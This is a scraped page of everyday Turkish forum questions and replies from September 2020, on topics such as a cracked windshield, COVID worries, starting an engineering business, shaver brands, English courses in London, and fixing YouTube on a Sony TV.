bu ucuz kitler pek işe yaramıyor deniyor çatlağa bağlı biraz yapan iki arkadaşımda da olmadı işe yaramadı.

soruna cevap nereden alabilirim kısmına cevabım maaleef yok maksat boşa paran gitmesin.
0
basond
(05.09.20)
basond+1
yasadigim yerde her iki senede bir on cam degistiriyoruz, mutlaka catliyor yola attiklari taslardan dolayi. catlaga care yok, camin degismesi lazim.

orjinal camlar cok pahali, ben yan sanayi kullaniyorum simdiye kadar sikinti yasamadim. Ama aracta bir suru sensor var ise yan sanayide bazen sikinti cikabiliyor diye duydum. Aracin caminda bir suru sensor var ise (yagmur sensoru disinda) iyi kalite bir yan sanayi taktirman lazim ya da riske girmeyip orjinal taktiracaksin.
0
cooperr
(05.09.20)
ha bu arada arabanda kasko varsa anlaşmanda ücretsiz cam değişimi olabilir mutlaka kontrol et
0
basond
(05.09.20)
Araç kiralık ve çatlağı aldıktan sonra gördüm. Taş sekmesi vs. olmadı o yüzden başkasının çatlattığı camı da yaptırmak istemiyorum :)
0
🌸chicha_v2
(05.09.20)
aracı kiralamadan önce 4 tarafını fotoğraflamak lazım bu gibi durumlar için. geçmiş olsun.
0
xrated
(05.09.20)
(6)

mesut süre meme

duyurukullanıcısı
bu adamın en komik lafı ne sizce?bayrak yapıcam.bokumu?bak aslanım?sıçayım böyle işe?böyle meme şeklinde varsa daha iyi olur.örnek,https://www.youtube.com/watch?v=YUnxdLJkW8E&ab_channel=AniBayrak
bu adamın en komik lafı ne sizce?

bayrak yapıcam.

bokumu?
bak aslanım?
sıçayım böyle işe?

böyle meme şeklinde varsa daha iyi olur.

örnek,

www.youtube.com
0
duyurukullanıcısı
(05.09.20)
naif beddua severim,
memelik
0
scudman1
(05.09.20)
"hay sıçam"

"ekran başındaki beleşçi"

"......beni tanı"
0
AlsterWasser
(05.09.20)
Tut şunu diyip konukla kavga edecekmiş gibi mikrofonu seyirciye uzattığı bi an var. Meme olsa en çok buna gülerdim.
0
IncredibleMau
(05.09.20)
Kolları serbest salıp çiçeğim beb, ağacım ben diyor ya.
0
baal
(05.09.20)
baal'ın dediği şeyleri yaptığında ben de pek gülüyorum.

ama böyle bayrak gibi bir şey için daha signature olarak "beni tanı" olabilir. "böyle diyemezsin, şöyle yapamazsın" gibi lafları oluyor bazı durumlara karşılık ama onlardan böyle bayrak olmaz. "beni tanı aslanım" gibi de olur.
0
nimberjack
(05.09.20)
lh3.googleusercontent.com

şunu yapcam galiba.
0
🌸duyurukullanıcısı
(05.09.20)
(2)

Hızlı okuma tekniği

clones
Bu teknik öğrenmeye değer mi? Sırf kısa sürede daha çok kitap okumak için okuma kalitesini de düşürmek ve zihnen kendimi de yormak istemiyorum. Kitap okuma aşkıyla yanıp tutuşan biri olarak bunu önerir misiniz? Önerirseniz önerebileceğiniz kaynaklar var mı? Yoksa boşver kendin bildiğin gibi mi yap d
Bu teknik öğrenmeye değer mi? Sırf kısa sürede daha çok kitap okumak için okuma kalitesini de düşürmek ve zihnen kendimi de yormak istemiyorum. Kitap okuma aşkıyla yanıp tutuşan biri olarak bunu önerir misiniz? Önerirseniz önerebileceğiniz kaynaklar var mı? Yoksa boşver kendin bildiğin gibi mi yap dersiniz?
0
clones
(05.09.20)
okuyarak zaten bir derece hızlanıyorsun. bence zevk ıcın okunan bir kitabı sulandırmaya gerek yok.
0
Techsavvy
(05.09.20)
edebiyat okuyacaksan hızlı okuma falan tamamen boş işler. bir edebi eserde bir ton teknik var. insan bazen sindirmesi gerekebilir zaten dikkat etmesi gerekebilir.

düzenli okumaya yapmaya başlayınca zaten beynin o işi yapan kısmı bu işe alışmaya başlıyor ve giderek biraz daha hızlanıyorsun ve daha uzun süreler başında durabiliyorsun. sonuçta da bir kitap daha hızlı bitiyor.

hızlı okuma uyguluyorum günde 2 kitap okuyorum falan diyenlere gülüyorum ben açıkcası. anca gözden geçirme gibi bir şey olur o okuma.
0
AlsterWasser
(05.09.20)
(7)

Remington vs Braun vs Philips

whyamy
Almak istediğim ürün benzer şekilde üç markada da var. İnternetteki bazı yorumlar çok olumluyken bazıları da çok olumsuz. Karar veremedim. Özellikle yetkili servis, yedek parçalar vs. açısından hangisini önerirsiniz?
Almak istediğim ürün benzer şekilde üç markada da var. İnternetteki bazı yorumlar çok olumluyken bazıları da çok olumsuz. Karar veremedim. Özellikle yetkili servis, yedek parçalar vs. açısından hangisini önerirsiniz?
0
whyamy
(05.09.20)
Philips
0
since1907
(05.09.20)
Philips +1
0
Tochinoshin
(05.09.20)
braun aşı yapsa gider yaptırırım
0
kelepir
(05.09.20)
ben braun kullanıyorum.

ama remington'a da göz kırpıyorum.
0
AlsterWasser
(05.09.20)
braun bu işin kompedanı olmuş. braundan şaşma derim.
0
hemsta
(05.09.20)
ürünün ne olduğuna bağlı olarak değişir. mesela traş makinesinde philips çok iyi ken remington saç şekillendiricilerinde iyi. braunun hiç bir bokta iyi olduğunu düşünmüyorum bu arada.
0
xrated
(05.09.20)
Ürün IPL cihazı. Hepsinin özellikleri neredeyse aynı. Üçünün beğeneni de şikayet edeni de çok. Bari servisi falan göz önüne birine alıp karar vereyim dedim.
0
🌸whyamy
(05.09.20)
(10)

çok sıkıldım ne zaman bitcek bu covid?

duyurukullanıcısı
ya yurtdışına gidemiyoruz. iş alamıyoruz. networklerden siliniyoruz.toparlamak en az 2 yıl.bugün sona erdi deseler toparlamam en az 2 yıl.nasıl olcak bu işler ya? düşünmekten uyuyamıyorum.
ya yurtdışına gidemiyoruz. iş alamıyoruz. networklerden siliniyoruz.

toparlamak en az 2 yıl.

bugün sona erdi deseler toparlamam en az 2 yıl.

nasıl olcak bu işler ya? düşünmekten uyuyamıyorum.
0
duyurukullanıcısı
(05.09.20)
Herkeste aynı dert... seneye ilkbaharda biter sanıyorum
0
megalomaniac
(05.09.20)
2022 yılbaşı civarları. (en iyi ihtimalle)
0
foolrules
(05.09.20)
Pfizer’ın ilaçları olumlu sonuçlanmış. Geçenlerde abd’de tüm eyaletlerle aşı dağıtımına hazır olun, ekipleri hazırlayın denmiş. Kasım ayında halka ilaç ve aşı dağıtımı yapılabilirmiş. Ruslar zaten başladı ama hiç kimse güvenmedi başlarda. Şimdi dsö sonuçları olumlu diyor ama bilmiyorum bakalım. Ben Ocak Şubatta aşı olacağımızı tahmin ediyorum en geç.
0
avatar is back
(05.09.20)
Sal gitsin. Düşünce olmuyor.
0
superfluid
(05.09.20)
Abdde eczanelerde şu an kilitli dolapta aşı varmış
Kasımda abd aşılanmış olacak 2021e dek aşı anlaşması olan çoğu ülke aşılanmış olacak.
Trye ne gelir ne zaman gelir bilinmez
0
photo85
(05.09.20)
türk halkı polyannacılığı sever. millete söyleyince kuduruyor ama ben uzun yıllar biteceğini düşünmüyorum.
0
nothing in my way
(05.09.20)
yurtdışına gidip de n'apacan
0
in a world of magnets and miracles
(05.09.20)
türkiye'de para mı var?

yurtdışına gidip adamın yaptığı işi daha ucuza yapıyoz diyorum 3-5 damlıyor.

damlıyordu.
0
🌸duyurukullanıcısı
(05.09.20)
aşı olayı yalan, tek umut tedavi yöntemlerinin geliştirilebilmesi.
0
nuisance
(05.09.20)
türkiye'de para yok da türkiye'de yurdışında olduğu kadar yüksek hayat masrafları da yok. kendi habitatından uzak olmak da cabası. neyse ayrı konu. aklı olan tr'den ayrılmaz düzgün işi varsa.
0
in a world of magnets and miracles
(06.09.20)
(9)

Kendi işini kuran mühendis arkadaşlar...

va
Merhabalar,Herkesin aklında kendine bir iş kurup, yaşarken bunu deneyimlemek vardır diye düşünüyorum. Benim de 10 yıllık bir makine mühendisi olarak kafamda geziyor böyle tilkiler. Ancak memnun olduğum bir iş ve özel hayatım, iyi bir düzenim var. Haliyle bunun ağırlığı ile salaş haldeyim.Bir yanım b
Merhabalar,

Herkesin aklında kendine bir iş kurup, yaşarken bunu deneyimlemek vardır diye düşünüyorum. Benim de 10 yıllık bir makine mühendisi olarak kafamda geziyor böyle tilkiler. Ancak memnun olduğum bir iş ve özel hayatım, iyi bir düzenim var. Haliyle bunun ağırlığı ile salaş haldeyim.

Bir yanım böyle iken bir yanım da dediğim gibi hayal dünyasında geziyor, bunu gerçekten istiyorum. Var mıdır içinizde bunu gerçekleştiren birileri?
Tabi sektörler vs. çok detay var ancak genel anlamda soruyorum. Distribütörlük olur, tasarım, dayanım hesap danışmanlığı olur, torna dükkanı açmak bile olur.

Ya da diğer mesleklerden de olur, adım atabilen başarılı olanlardan serüvenlerini, deneyimlerini dinlemek isterim.
0
va
(05.09.20)
Bir akrabam fabrikada mekanik bakımcı olarak çalışıyordu. En sonunda bıktı ve kendi işini kurdu. Otomatik şanzıman tamiri yapan bir yer açtı sanayide. Başarılı oldu.
0
dissendium
(05.09.20)
22 yaşında kendi firmasını kuran 8 yıldır mühendislik danışmanlık yürüten bir makine mühendisi olarak söyleyeyim ;

10 yıllık süreçte filin sadece hortumunu gördün hocam. kendince bir 10 yıl da verip 2030'da para kazanmaya başlarım diye düşünebiliyorsan başla. hele ki bu ortam da.

başarı hikayelerine çok inanma. sana dertli dertli başarısızlıklarını anlatan insanları dinle. başarı hikayelerinde destek çıkan amca, dayı oluyor hep.

bir excel yap. 5 yıllık olsun. tahsilat kısmına %20'lik bir para alma şansı koy. yani %20 şans ile firma sana ödeme yapıyor. sonra zaten excel sana gerçeği göstericek.

hangi firmalardan para alamadım söylesem iş yerine gider toprağı öpersin öyle diyeyim.
0
duyurukullanıcısı
(05.09.20)
İyi bir mühendis olmakla, iyi bir tahsildar olmak, iyi bir finansçı olmak, iyi bir tüccar olmak, iyi bir satışçı olmak, iyi bir yönetici olmak bunlar bambaşka şeyler. Hele ki çevreniz, amcanız dayınız yoksa kesinlikle yapılacak iş değil.
0
roket adam
(05.09.20)
Ben de sektorde 10 seneyi devirdim. Kendi basina takilmaya calisanlarin yarisindan fazlasi ilk 5 sene icinde batiyor, yurtdisinda durum boyle. Cok riskli bir sektor, iyi muhendislerin coguna bakinca ben bir is adami goremiyorum, cok iyi bir memur goruyorum. Para kazanmak, musteri kovalamak fakli bir olay.

Ben gittim ufak bir sirket actim, havayi kokluyorum su anda..Bir yandan tam zamanli calisirken haftasonlari ya da is cikisi kendime kovaliyorum. Bir iki kucuk is yaptim ama istifa etme noktasina gelebilmem icin daha cok yolum var.

Denemelik ufak bir sirket ac, birkac kucuk is yap, belkide sevmeyeceksin. Duzenini bozmani hele boyle bir piyasada tavsiye etmem. Ama obur taraftan risk almadan da bir bok olmuyor, salla basi al maasi bir yere kadar tatmin ediyor eger memur kafali degilsen..
0
cooperr
(05.09.20)
benim aynı dönem arkadaşlarda firmalarda biraz yükselince böyle bir ben oldum havasına giriyorlar.

bana gelip ya şöyle şöyle bir şey yapsak nasıl olur diyorlar.

elemanlara kdv nedir? gelir vergisi nedir? stopaj nedir? bunlara göre nasıl fiyat belirlenir gibi temel bakkal seviyesinde fiyatlandırmayı öğretmek yaklaşık 2 ayımı alıyor.

çünkü adam firmada altında 10kişi ve 50milyonTL ile sadece bir iş yapıyor.

kendi firman olunca 15 kişilik çalışıp 10kTL toplayamıyorsun.

adama tasarım yap FEM, CFD kas, render at, çizim yap. kendi cebinden prototip yapıp getir herşeyi mükemmel seviyede yap. paranı vermiyor adam.

git diyor dava et. dava sürecek zaten 5 yıl. sen cebinden harcamışsın belki 5000TL avukat saat başı istiyor 300TL. muhasebeci ayda 500TL istiyor. bağkur 800-900TL vs vs.

ya ben diyorum ki iyiki 22 yaşında başlamışım yoksa 30'dan sonra çekilecek dert değil.

Türkiye şartlarında sana yapman gerekeni söyleyeyim.
güvendiğin biraz piyasa tecrübesi olan muhasebe, finans bilen arkadaşına el atından firmalar hakkında tiyo vereceksin.

şu mal şu kadar şu teklif şu kadar vs vs. eleman gidip aynı kalitede daha ucuz teklifi bulacak sende oradan primini alacaksın.

senin için en kebap iş bu.

firma mutlu daha ucuz.
eleman mutlu iş yaptı.
sen mutlusun para geldi.

herkes mutlu.
0
duyurukullanıcısı
(05.09.20)
sakin ha iyi bir muhendisin iyi bir isletmeci olacagini ya da firmayi iyi yonetecegi gibi duz mantik kurmayin.
ikisi cok ayri dunyalar.
google'a turkiye'nin en fazla santiye bitirmis muhendisi yazinca karsiniza turbo sadik cikiyor. ama isi cevirmek sirket sahibi olmak bambaska bir sey hele hele ortak varsa.
cok prensipli olmalisiniz duygusallik sifir gerektigince kimsenin gozunun yasina bakmamali ekonomiyi onceden sezebilmeli kuvvetli baglantilar olmali.
celik gibi de sabir lazim.
ben 4 milyon batirdim sirketimin ise 16 milyon alacagi var.
sindirgi devlet hastanesi ve kirklareli spor salonu hala oyle yarim.yamalak durur. isteyen ibretialem icin gidip baksin.
ha sanilmasin ki ben hata yaptim.yanlis yaptim hesap kitap bilemedim de battik alakasi yok.
dedigim gibi acima duygunuz olmayacak onurunuz gururunuz da olmayacak. is hayatinda oyle erdemler artistlikler vs gecerli degil. adami aliyorlar asagiya.
0
turbo sadık
(05.09.20)
turbo çok hardcore girmiş.

o kadar da değil ''acima duygunuz olmayacak onurunuz gururunuz da olmayacak'' gibi bir durum yok.

ama girdiğin sektörün dinamikleri var. onlara uyum sağlaman lazım. bazı sektörler mesela çelik işleyen kalıpçılar, plastikçiler vs pazarlık ederken ana bacı söver pazarlıktan sonra da hiç birşey olmamış gibi içmeye giderler.

sen orada hmm ben ana bacı laf yemeyi göze alabilirim diyip ya sektöre gireceksin yada bu sektöre hiç girmeyeceksin. tabi ne kadar küfür yersen o kadar para kazanıyorsun. orantı bu.

bir oxford beyefendisi gibi TR'de kendi firman ile para kazanmak istiyorsan kendi networkünü oluşturup çalışman lazım tabi networkde öpücük ile olmuyor en az 10 yıl. onu da korumak ayrı bir uğraş.

diyelim 6 firmalık bir çember oluşturdunuz.

a firması çizim
b firması imalat
c firması elektronik
d firması pazarlama
e firması destek/aftersales
f firması yurtdışı işlerine bakıyor

ve kimse kimsenin işine karışmıyor. b firması çizimde yapayım accık daha kazanayım veya f firması kendi imalatımı yapayım demiyor.

bu tür iş çemberleri TR'de kazanıyor ama kurmak ve korumak çok zor.

çünkü yasa yok. adalet 8 yılda yerini buluyor ve mutlaka bir aç gözlü çıkıyor.
0
duyurukullanıcısı
(05.09.20)
Makine mühendisliğinin hangi kolundasınız bilmiyorum, ama inşaat-mekanik tesisat işlerinde, çok tecrübeli değil, prezentabl değil, fakat işini gerçekten çok çok iyi bilen, piyasayı sıkı takip eden bir mühendisle birkaç projede çalıştım. Adam tek başına firmalara danışmanlık yapıyor, yani projeleri inceleyip eksikleri, fazlaları veya değişse iyi olabilecek kısımları raporluyor, alternatif ürün-çözüm buluyor ve piyasadan fiyat topluyor, pazarlık yapıyor vb. Adama HEPA filtreyi sorunca, HEPA'nın tarihinden anlatmaya başlıyor. Başka mühendislere sorduğumda "abi işte tozları toplayan ameliyathane filtresi" gibi cevaplar alıyordum.

Bu adamla ben 5-6 sene önce çalıştım ve o zamanlar öyle çok büyük paralar kazanmıyordu. Şimdi iletişimim yok ama hem çok firma ile irtibatı olduğu için, hem de işini çok iyi bildiği için, kesinlikle ekonomik olarak sıkıntıda olduğunu düşünmüyorum. Belki bir 10 sene sonra "zengin" bile olabilir.

Eğer böyle biri iseniz hiç durmayın...
0
malheiros
(06.09.20)
o isler hic de oyle degil. size papaz krizinden ornek vereyim.

kirklarelindeki santiyede daha temel atiliyor. temele 200 kusur ton demir indirdik ve bagladik. bilen bilir temel demiri genelde boy atilir pek kesme bicme isi olmaz.

bu kriz bi patladi, demir fiyatlari uctu. aslinda ucmasi bir sey degil fiyat surekli yukseldigi ve oynadigi icin nakit paranla demir alamiyorsun alamiyordun demir borsasi islem yapmiyor.

biz ihaleye girerken demir 2700 idi o kriz zamani 4700'e kadar karaborsada demir alabiliyordun.

diger arkadasa dedim ki, bak dolar ucuyor kriz oldu. biz bu demirin parasini alsak dahi sonraki imalatlarda cok zorlanacagiz bu isi devam ettirmeyelim. arkadasim da olur mu biz soz vermisiz biz sifirdan geldik deli gibi calisiyoruz agzindan cikani kulagin duyuyor mu isi yarida biraktirdi dedirtmem is ahlaki bunu gerektirir zararina da olsa bu isi bitirecegiz vs sayiyor. sanki isi bitirince madalya takacaklar ake.

dedim ki bak kardesim 200 ton demiri baglamisiz demiri 3000den aldik. bu demiri 20 yevmiye versek gerisi geri sokeriz. 130 liradan 2600'e demiri tekrar temelden sokeriz. ve 200 ton demiri nakite ceviririz. 3000e aldigin demiri 4700 e satariz. ve bu hamle ile 340.000 lira hicbir sey yapmadan karimiz olur. isi devam ettirme riski vs de olmaz.

arkadas eski seylere devam. sagda solda ne derler. biz boyle mi is almaya devam edecegiz. sonra bize isi yarida birakti kacti derler. er kisi lafi etmisiz. bu santiye bitecek. bu arada daire ile konusuyoruz. daire tam gaz devam edin biz size paranizi odeyecegiz diyorlar.

velhasil biz temeli doktuk. bekledigimiz parayi da alamadik. sirket diger santiyenin de aksakliklari ile batti.

sadece biz batsak koyasin dibine.
yemekciye 50.000 borc. kiralar odenmedi. akaryakitciya odenmedi. nalbura odenemedi. iscilere odenemedi. kulevincin kirasi odenemedi. iskele kiralikti odenemedi. arabalar kiralikti odenemedi. jenerator kiralikti o da odenemedi. ve daha akliniza gelen bircok kalem. bizimle beraber onlara da girdi.

bilmem anlatabildim mi sirket yonetmek isveren olmak bambaska meziyetler ister.
0
turbo sadık
(07.09.20)
(3)

erkek cüzdan önerisi

GreyFever
merhabalar. şöyle kompakt, güzel bi cüzdan arıyorum içine biraz kağıt para bi kaç kart alsın yeter türden. şu klasik yana uzun olanlar mı ne var onlardan soğudum birazhttps://www.trendyol.com/garbalia/canvas-vintage-deri-kahverengi-kartlik-cuzdan-p-43174036bu var istediğim gibi ama içime sinmedi pek
merhabalar. şöyle kompakt, güzel bi cüzdan arıyorum içine biraz kağıt para bi kaç kart alsın yeter türden. şu klasik yana uzun olanlar mı ne var onlardan soğudum biraz

www.trendyol.com

bu var istediğim gibi ama içime sinmedi pek. varsa tavsiyeleriniz bekliyorum. teşekkürler
0
GreyFever
(05.09.20)
Bütcen ne aslanim
0
all girls dream
(05.09.20)
hotiç, us polo vb'de bu tip güzel kartlık/cüzdanlar var.
0
invictae
(05.09.20)
kemal tanca
5 yıldır kullanıyorum.
0
kanlakarisikyagmur
(06.09.20)
(3)

londra'da Ingilizce kursu

fakyoras
selamlar,is sebebiyle Londra'ya tasindik, esim icin Ingilizce kurs ariyoruz. google'a yazdigimda yuzlerce yer cikiyor, fiyatlar da birkac pounddan binlerce pounda kadar cikabiliyor. daha once londra'da Ingilizce kursuna gitmis olan, tanidigi olan varsa hangisini onerir acaba? ortalama ucret ne kadar
selamlar,

is sebebiyle Londra'ya tasindik, esim icin Ingilizce kurs ariyoruz. google'a yazdigimda yuzlerce yer cikiyor, fiyatlar da birkac pounddan binlerce pounda kadar cikabiliyor.

daha once londra'da Ingilizce kursuna gitmis olan, tanidigi olan varsa hangisini onerir acaba? ortalama ucret ne kadar olmali?
0
fakyoras
(05.09.20)
gunluk konusma ingilizcesi mi? business english mi?
londra da nerde kaliyorsunuz? gunluk konusma ingilizcesi ise (sifir olmadigini varsayiyorum), bence hobby kurslari ve oradan local arkadas. council`in sitesinde ve local mecralarda bisiler cikar. yoksa ulasim da para.
0
camussar
(05.09.20)
gunluk konusma ingilizcesi, su anda merkezdeyiz ama ealing'de ev tuttuk oraya tasinacagiz birkac hafta sonra.
0
🌸fakyoras
(05.09.20)
www.ealing.gov.uk (bunu birebir bilmiyorum)
www.rhacc.ac.uk (ama bu iyi)

deneme kurslari var, ilk ders free, begenirse gider esiniz, begenmezse gitmez. esol vs var, grammar specific var saniyorum. bunlar council destekli.

greenwich`te free bir kurs var adini hatirlamiyorum.
0
camussar
(05.09.20)
(4)

türkiye'de "all you can eat" tarzı mekanlar yok mu?

mr.goodcat
yurtdışında çokça görüyorum. özellikle otellerin restoran kısımlarında günlere göre fiyatlar oluyor ama türkiyede pek rastlamadım. gören bilen duyan var mıdır? örneğin istanbulda varsa fiyatlar ne alemde akşam için?kahvaltı hariçtir. o zaten çokça var.
yurtdışında çokça görüyorum. özellikle otellerin restoran kısımlarında günlere göre fiyatlar oluyor ama türkiyede pek rastlamadım. gören bilen duyan var mıdır? örneğin istanbulda varsa fiyatlar ne alemde akşam için?

kahvaltı hariçtir. o zaten çokça var.
0
mr.goodcat
(05.09.20)
Cevahir’de üst katta bir Çin lokantası vardı dediğiniz gibi. Tek kişi ücreti verip tabağınızı istediğiniz gibi dolduruyorsunuz. Tabi hala duruyorsa.
0
catch the arrow
(05.09.20)
Go mongo vardı catch the arrowun dediği gibi fiyat sabit tabağa ne istersen koyup Noodle yapıyorsun ama senin dediğin tarzdan Biraz farklı eskiden pizza hut yapıyordu sınırsız pizza
0
all girls dream
(05.09.20)
25 sene once falan 4. leventte bir tane pizza hut vardi orda sinirsiz pizza/salata yedigimizi hatirliyorum ama bence o isin Turkiye'de tutmasi zor. Cok ucuza kusana kadar yeme muhabbeti kuzey amerika'ya ozgu birsey, adamlar bu tarz seylerde 1-2 dolar kara gecince cok mutlu oluyorlar, bizde oyle bir kultur yok.
0
cooperr
(05.09.20)
5* otellerin neredeyse tümü. pizza hut'ların neredeyse tümü. fiyatlarını bilmek mümkün değil. all you can eat yemekçiler odası fiyat tarifesi gibi bişey yok benim bildiğim. otel fiyat ne çekerse artık. ama 40 dolardan aşağı fiyat en azından oteller için beklenemez gibi bişey.
0
eşki sözlük yazarı
(05.09.20)
(6)

elektrik kesintisi sonrasında tv'de youtube izleyememe

panamera
Merhaba,sony xf serisi bir tv var. iki gün öncesine kadar problem yoktu, ben evde yokken bir elektrik kesintisi olmuş; ondan beri youtube'a giremiyorum. ve uygulama ekranında iken "ethernet is not connected" diye bir mesaj geliyor. Oysa ayarlardan baktığımda ethernet bağlantısı için "connected" yazı
Merhaba,

sony xf serisi bir tv var. iki gün öncesine kadar problem yoktu, ben evde yokken bir elektrik kesintisi olmuş; ondan beri youtube'a giremiyorum. ve uygulama ekranında iken "ethernet is not connected" diye bir mesaj geliyor. Oysa ayarlardan baktığımda ethernet bağlantısı için "connected" yazıyor.

ve ayrıca netflix'te hiç sorun yok (hem sadece ethernet hem de sadece wifi ile giriliyor). daha önce de bir kaç kez elektrik kesintisi sonrasında problem olmuştu ama tv fişini çek-tak veya modemi kapa-aç yapıyordum ve sorun çözülüyordu. bu sefer ne yaptıysam olmadı.

denediklerim:
ethernet kablosunu çıkarıp sadece wi-fi ile bağlanmak - olmadı
browser'dan youtube'a girmek - internet var, google'da youtube linkleri çıkıyor ama video başlamıyor.
youtube update uninstall etmek - olmadı
uygulama ekranından youtube'u disable - enable etmek - olmadı
youtube'ın kendi ayarlarından da birşey bulamadım.

tv güya akım korumalı prizde.

servise sormadan önce buraya sormak istedim. bir fikri olan var mı?
şimdiden teşekkürler, zamanınızı aldım.
0
panamera
(05.09.20)
tv nin internet ayarlarından dns'i elle manuel ayarla. 8.8.8.8 yaz. olmazsa modemdeki ayarlardan dns'i 8.8.8.8 yap. sonra ikisini de kapat aç dene. başka yerde internet olup da youtube'de yoksa sunucuya bağlanamıyordur.
0
mr.goodcat
(05.09.20)
sağol hocam, ayarlarda zaten 8.8.8.8. varmış. yine de tekrar yazdım, maalesef olmadı. modemi deneyeceğim.
0
🌸panamera
(05.09.20)
olmadı android'i de sıfırlamayı dene.

bizde de sony vardı böyle abuk şeyler oluyordu. sonunda evdekiler koltuk taşırken ekrana geçirdi televizyon çöp oldu :)
0
passion rules the game
(05.09.20)
tv'nin saatini değiştirmen lazım. saat ayarlarından "ağ" seçeneğini seç.
0
kahve45
(05.09.20)
Hocam saati değişince oldu. Çok teşekkür ediyorum, işlerin rast gitsin.
0
🌸panamera
(06.09.20)
rica ederim kolay gelsin.
0
kahve45
(29.09.20)
(6)

Almanyada araba alacağım, hiç anlamam ne almalıyım ?

wiekannich
10-13.000 euro bandında bir araba almayı düşünüyorum.Yaş 27 genç adama gidecek yakışıklısından bi bmw bakıyorum ama tam bilemedim. Şu hoşuma gitti meselahttps://suchen.mobile.de/fahrzeuge/details.html?id=304487170&damageUnrepaired=NO_DAMAGE_UNREPAIRED&isSearchRequest=true&makeModelVariant1.makeId=35
10-13.000 euro bandında bir araba almayı düşünüyorum.
Yaş 27 genç adama gidecek yakışıklısından bi bmw bakıyorum ama tam bilemedim.
Şu hoşuma gitti mesela

suchen.mobile.de

Araba konusunda bizim milletten sağlam otorite yoktur diye burdan sorayım dedim, siz olsanız bu skalada ne alırdınız ?
0
wiekannich
(05.09.20)
Oranın Fiat Punto’su değil miydi o ya (Ali Can reisimizi bir kez daha rahmetle anıyoruz)

Bence bunu almaktansa daha düzgün bir Japon al daha iyi.
0
catch the arrow
(05.09.20)
Bmw ve türk ikilisi bir araya gelince dalga geciliyor :D
Bence bmw almayin.
0
kuehles blondes
(05.09.20)
bmw ya da merc almayi dusunuyorsan mutlaka bayi garantili al. Ikinci el bayiden aldiginda aracin fabrika garantisi bitmis olsa bile bayinin sana garanti verebiliyor olmasi lazim. 2-3 sene garantisi olsun zira kullanmasi zevkli ama nazik araclar, illa sikinti cikartacak. Bir de uzun sure binmeyi dusunuyorsan bir tane saglam bmwci usta bul ki olayin anavataninda oldugun icin bu cok da zor olmasa gerek.
0
cooperr
(05.09.20)
kuehles blondes artı bir. Polis cevirir de cevirir.
0
buf-e kür
(05.09.20)
beemwey Xi3 elektrikli önerim :-)
0
ankarakecisi
(05.09.20)
maliyet hesabı yapıyorsanız ve türkiyeden almanyaya gitmiş ve almanyadaki ilk aracınızı alacaksanız kasko bedelini düşük tutmak için nispeten düşük motor hacimli bir araba tercih edebilirsiniz. türkiyedeki hasarsızlık indirimlerinizi vs orada saydırabiliyormuşsunuz ama çok meşakkatli olduğunu duymuştum.
ayrıca bmw-türk olayı doğru :)
0
semyasa
(06.09.20)
(3)

Kısmi zamanlı öğrenci olarak çalışan, çalışmış olan var mı?

GoodMorningTeacher
Üniversite öğrencisi olarak, 2019 Eylül'den beri part time ya da tam zamanlı iş arıyorum ama başvurularımın hiçbirine geri dönüş olmadı. İş deneyimim yok. Part time iş bulabilsem aslında çok iyi olur. Maaş, sigorta, yemek açısından avantajı var. Üniversitemin kısmi zamanlı öğrencilere iş imkanı var.
Üniversite öğrencisi olarak, 2019 Eylül'den beri part time ya da tam zamanlı iş arıyorum ama başvurularımın hiçbirine geri dönüş olmadı. İş deneyimim yok. Part time iş bulabilsem aslında çok iyi olur. Maaş, sigorta, yemek açısından avantajı var.

Üniversitemin kısmi zamanlı öğrencilere iş imkanı var. Haftalık max 15 saat çalışıp, ders programlarına göre çalışma saatleri belirleniyormuş. Sadece sigorta, yemek gibi artıları yok. Açıkçası daha önce çalışan birini bulamadığımdan işleyiş nasıl bilmiyorum. birde kampüsler kapalı olduğu için çalışma alanı tenha olacaktır bu da beni ister istemez tedirgin ediyor. Aylık galiba 400-500 arası ücret veriliyor. Harçlığımı çıkarabilecek bir iş bulabilsem yeterli benim için. Ama okulu aksatmamam lazım. Bu yüzden aranızda kısmi zamanlı olarak çalışmış ya da çalışmış tanıdığınız varsa nasıldı işleyiş?
0
GoodMorningTeacher
(05.09.20)
Umarım soruyu doğru anladım. Üniversiteler dönem dönem ihtiyaç ya da hocalardan gelen talepler doğrultusunda açar. Benim gördüklerim de çalışılacak yer belirtiliyor zaten. ( siz detay vermemişsiniz diye yazdım belki görmüşsünüzdür ilanlarda)

Ben çalışmadım (okurken başvurmuştum bitanesine ama olmadı) ancak gördüklerim şöyle. Bir tanesi üniversite öğrenci işlerinde çağrı merkezinde idi. Arayan öğrencilerin sorularını cevaplıyorsunuz ekipte 8-10 öğrenci başlarında da bir memur. Bilmediğiniz şeyleri de memura soruyordunuz.

Gördüğüm başka bir iş üniversitenin bir araştırma merkezinde oradaki hocalara asistanlara yardım ediyordunuz daha teknik bir şeydi en azından mesleki olarak katkısı var.

Bir diğer gördüğüm bi bölümde bölüm başkanı talep etmişti, evrak işi, sektereter yoktu o ara bölümde onun yerine evrak işlerine öğrenci bakıyordu yardım ediyordu.

Bazen de yine hocalar talep ediyor labda yardım için.

Tenha olması daha iyi değil mi ? pek yoğun olmaz.

Bazı hocalar tam gelmesenizde haftalık max saati doldurmuş gibi imzalıyorlar bazıları gittiğin geldiğin saate dikkat ediyorlardı.
0
fezagezgini_4
(05.09.20)
@fezagezgini_4

Biz de okul danışmada, kütüphanede, evrak işlerinde çalıştırıyor. Hocalarla hiç alakamız yok.
0
🌸GoodMorningTeacher
(05.09.20)
Ben erasmus ofisinde çalışmıştım. Okul belirli dönemlerde şu alanlarda ihtiyaç var diye bir liste paylaşıyordu sitesinde. O birimle direkt konuşup, form doldurup başlamıştım.

Sınav zamanları ve derslerime göre çalışma zaman ve saatlerini ayarlıyordum yardımcı oluyorlardı. Benim için gayet güzel ve eğlenceliydi. Okula gitmeye bahanem oluyordu normalde gitmezdim.
0
jazzabel
(05.09.20)
(1)

Televizyona takmalık Xiaomi ürünü

nundu
Şu an piyasada bi Box bi de Stick var sanırım. Bunların farkı nedir, fiyat/performans olarak hangisi daha iyidir, bilgisi olan paylaşırsa çok sevinirim
Şu an piyasada bi Box bi de Stick var sanırım. Bunların farkı nedir, fiyat/performans olarak hangisi daha iyidir, bilgisi olan paylaşırsa çok sevinirim
0
nundu
(05.09.20)
www.dignited.com

box 4k, stick 1080p
0
orient blue
(05.09.20)
(4)

evin kentsel dönüşüme gireceğini nasıl anlarız?

mg3929
31 yaş üzeri yazan ilanlarda binanın kentsel dönüşüme girip girmeyeceğini nasıl anlayabilirim? Önümüzdeki 2-3 yılda kentsel dönüşüme girecek bi ev almak bulmak için ne yapmam lazım?
